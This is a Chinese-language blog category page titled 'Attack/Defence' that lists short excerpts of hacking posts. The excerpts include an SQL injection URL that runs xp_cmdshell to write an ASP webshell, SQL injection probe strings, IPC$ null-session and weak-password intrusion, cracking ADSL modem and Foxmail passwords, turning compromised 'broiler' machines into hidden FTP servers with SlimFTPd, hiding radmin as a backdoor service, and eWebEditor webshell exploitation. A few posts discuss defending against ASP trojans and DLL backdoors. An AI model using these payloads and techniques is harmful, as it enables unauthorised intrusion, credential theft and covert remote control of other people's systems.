目前分類:Attack/Defence (22)

瀏覽方式: 標題列表 簡短摘要


本來網路上許多影片大家應該都會有想要下載到自己電腦的衝動

雖然網站總是有提供什麼收藏等等(=.=...本人沒用過)

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

從這裡開始(你的第一個帳號)


--------------------------------------------------------------------------------

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

3389肉雞快捷鍵
CTRL+ALT+END 把「任務管理器」抓出來 
CTRL+ALT+BREAK這個就是切換全屏顯示。
CTRL+ALT+END 打開「Windows 安全」對話框。

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

1、 用^轉義字符來寫ASP(一句話木馬)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^>c:\mu.asp';--

? echo ^

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

檢測可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)
檢測表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

一、 簡介:
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的權限,從而達到不可告人的目的.

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

現在很多企業或者公司基本上網方式基本上都是申請一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然後用一台服務器做網關,服務器兩塊網卡,一塊是連接到Internet,另一塊是連接到內網的HUB或者交換機,然後內網的其他機器就可以通過網關連接到Internet。
  也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想像中的那麼難。
  Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程管理工具,不是嗎?呵呵。沒有做特別說明的話,文中提到的服務器OS都為windows
2000。服務器為Linux或其他的話,原理也差不多,把程序稍微修改就行了。
<<第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網>>

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

網上有許多網友提出這樣的問題:究竟網站的主頁是如何被黑的?黑客們到底是如何入侵服務器的?
在討論這部分知識前,讀者需要知道——入侵網站是非法的;但是在網絡上找到網站的入侵漏洞並通知該網站是受到歡迎的。為什麼要這樣尋找入侵漏洞或入侵哪,著名的黑客H ackalot說過「入侵網站是利用所學的知識來學習新的知識的一種辦法」,這也就是中國人所常說的「溫故而知新」。
【原理】
儘管為服務器設計軟件的軟件工程師們想方設法提高系統的安全性,然而由於系統管理員的水平參差不齊或安全意識底下,往往給黑客提供了入侵的機會。

DeepSe@ 發表在 痞客邦 PIXNET 留言(3) 人氣()

1.介紹
  這裡介紹的方法主要通過端口80來完成操作,具有很大的威脅性,因為作為網絡服務器80端口總要打開的。如果想方便一些,下載一些WWW、CGI掃瞄器來輔助檢查。
  而且要知道目標機器運行的是何種服務程序,你可以使用以下命令:
  telnet 《目標機》 80
  GET HEAD / HTTP/1.0

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

用的是WINDOWS 2000 SEVER

  1 X-SCAN掃瞄IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)

  2 打開DOS系統 在DOS下進行*作!

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

找漏洞入侵1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現「請登陸後使用」,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.


DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

在16期《紅客路線》欄目的《黑軟尋寶圖》中,簡單地介紹了一款破解ADSL帳號密碼的軟件「ADSL密碼終結者2005」,很多朋友給來子寫信想知道這款軟件的具體用法,為了滿足大家的需求,來子特別安排了本文,一步一步詳細介紹「ADSL密碼終結者2005」的使用方法。

  一、指定入侵IP地址

  在入侵ADSL貓之前,我們首先要從指定的IP地址段中,找到使用ADSL貓自動撥號上網的寬帶用戶,這就離不開掃瞄工具了。ADSL密碼終結者2005中已經自帶了掃瞄工具,而且還提供了IP地址段查詢功能,可以方便的指定要入侵的IP地址段。

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

通過FTP站點下載文件是目前最常用的傳輸文件方法之一,特別是對於企業用戶來說,公司建立一個專門的FTP服務器提供給員工,讓他們通過這個服務器共享資源是最便利的辦法。不過作為網絡管理員的你是否真正瞭解FTP的安全呢?不要以為設置個複雜的管理員帳戶密碼就可以萬事無憂了,也不要以為將系統安裝上最新的補丁或者選擇最新版SERV-U等FTP搭建工具就可以萬無一失了。今天就由筆者帶領為大家介紹在默認情況下FTP站點傳輸數據方面的漏洞,當然在文中還會為讀者介紹如何彌補這些漏洞。
  一、破解FTP用戶名和密碼

  首先我們要知道默認情況下FTP站點信息是用明文進行傳輸的,沒有進行任何的加密。也就是說當用戶登錄FTP站點輸入用戶名和密碼時,這些信息是沒有加密的。非法用戶可以通過sniffer等工具將這些信息還原成本來面目。

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

來個腦筋急轉彎緩解一下緊張的氣氛先:如果你用《黑防》的知識一不小心得到一台肉雞,裡面又有許多你想要的東西,你會怎麼辦呢?怎麼樣沒有人知道吧,呵呵,當然是把他們拷回來了!
好了只是輕鬆一下,現在我們進入主題,正如我的腦筋急轉彎說的,大家的答案也應該是拷回來吧!,但是關鍵是怎麼拷呢?用Serv—U,把肉雞建成為一個ftp服務器,然後狂拷東西!好,如果你不怕管理員發現你的Serv—U,或者其他的大個頭的ftp軟件,那麼你可以看下一篇文章了。什麼?怕呀!對,這就對了,凡事小心為妙,那麼就用激烈的掌聲有請這款小巧玲瓏綠色環保功能強大配置簡單開機自啟動老少咸宜居家旅行必備的ftp木馬——SlimFTPd。唉,不要亂扔西紅柿呀,吃西紅柿可以用來減肥的………
我們到國外的網站http://www.whitsoftdev.com/slimftpd/可以下載到最新版本,我這裡用的3.17版本是7月11號發行的,壓縮包只有40多k,解壓出來也不到90k,他的官方網站上對他的功能有介紹,可惜我的英語學的不怎麼樣(書到用時方恨少,下一句是什麼來著?到完稿還不知道,有知道的告訴一聲,謝了!),所以就不冒充翻譯行家了,只是鄭重的告訴你,你想要的功能它都有!好不好用試一下就知道了(反正俺們這裡人用過的都說好)。本文主要講如何配置這款小木馬。
解壓出來有4個文件:slimftpd.conf、slimftpd.xml、SlimFTPd.exe、ServiceTool.exe。
下面我們來配置ftp小木馬:用記事本打開slimftpd.conf,恐怖全部都是英語!

DeepSe@ 發表在 痞客邦 PIXNET 留言(2) 人氣()

站長在使用eWebEditor的時候是否發現,eWebEditor配置不當會使其成為網站中的隱形炸彈呢?第一次發現這漏洞源於去年的一次入侵,在山窮水盡的時候發現了eWebEditor,於是很簡單就獲得了WebShell。後來又有好幾次利用eWebEditor進行入侵的成功經歷,這才想起應該寫一篇文章和大家共享一下,同時也請廣大已經使用了eWebEditor的站長趕緊檢查一下自己的站點。要不然,下一個被黑的就是你哦!

漏洞利用
利用eWebEditor獲得WebShell的步驟大致如下:
1.確定網站使用了eWebEditor。一般來說,我們只要注意發表帖子(文章)的頁面是否有類似做了記號的圖標,就可以大致做出判斷了。

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

問一些高手,都說用的radmin,一個很重要的原因就是它不被殺毒軟件查殺,而且速度非常快,界面也是簡潔美觀,可以說是高手的最愛,(什麼?沒聽說過?那就不用看了!)就是缺少一個反向連接的功能,但是對於我們控制服務器來說,反向連接也是多餘的,今天我給大家帶來一個radmin的智能化一鍵安裝成新的服務或者替換成系統已有的服務,這樣做的好處當然是誰都知道--進程不會被簡單地kill掉,而且不用擔心開機自啟動的問題。好,廢話不多說,現在就來開工。
首先配置服務端,很簡單的幾個設置,這裡我用的是影子漢化版3.2,隱藏任務欄圖標是肯定的了,改端口為2046(這個電影我至今看不懂,所以就用它了),如圖一



DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

昨天晚上剛寫完代碼在學校的QQ群裡透透氣,正好遇到學校的幾個計算機狂熱份子在裡面闊談網站建議。剛進去打個招呼,就被幾個寒氣避人的傢伙冒了幾句:「你們ncph最近很牛噠,有本事把我網站黑了----http://***.f78.net」哎,完全挑釁啊,恰好一美女在群裡面也叫到:「師傅,給他黑了。。。」哎,什麼時候又成她師傅了,沒辦法,衝著美女這句話回了一句:「我看看。」(我心裡也沒什麼底)

  接下來便開始分析他的網站,還好,不是全靜態的頁面,冒了一滴汗。當然先看看有沒有注入漏洞了。在幾個帶參數的網址鏈接後面加了個』號,沒反應,難道真的沒注入?這個站應該不是他自己寫的,是從網站上下源碼拼來的吧,我們看看他的結構。如圖1:


DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

Foxmail在國內擁有大量用戶,由於種種原因,很多用戶需要把Foxmail裡面的電子郵件、郵箱賬號設置等轉移到其他 E-mail 軟件中,或者忘記了賬戶密碼、郵箱密碼而把自己鎖在門外。然而由於foxmail糟糕的安全性能,我們完全不必為此擔憂!下面我為大家介紹幾種破解Foxmail賬號或者打開加密賬號郵件的常用方法:
  友情提示:一把刀可以拿來切西瓜解渴也可以用來殺人越貨,我很不希望以下方法被用於滿足某些人不好的慾望,真心希望各位潔身自好!

  手段一

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

隨著ASP 技術的發展,網絡上基於ASP技術開發的網站越來越多,對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基於ASP技術的木馬後門,也越來越多,而且功能也越來越強大。由於ASP它本身是服務器提供的一貢服務功能,所以這種ASP腳本的木馬後門,不會被殺毒軟件查殺。被黑客們稱為「永遠不會被查殺的後門」。由於其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防範和清除,為我們的網管人員提出了更高的技術要求。下面我結合個人的經驗,談一下對兩款比較典型的ASP 木馬的防範方法,希望對大家能夠有所幫助。

  以下是第一款木馬的代碼:

<title>ASP Shell</title>

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

前言

  後門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的後門無法在隱藏自己,任何稍微有點計算機知識的人,都知道"查端口""看進程",以便發現一些"蛛絲馬跡"。所以,後門的編寫者及時調整了思路,把目光放到了動態鏈接程序庫上,也就是說,把後門做成DLL文件,然後由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進程,不開端口等特點,也就實現了進程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防範"為主題,並展開論述,旨在能讓大家對DLL後門"快速上手",不在恐懼DLL後門。好了,進入我們的主題。

  一、DLL的原理

DeepSe@ 發表在 痞客邦 PIXNET 留言(0) 人氣()

1 2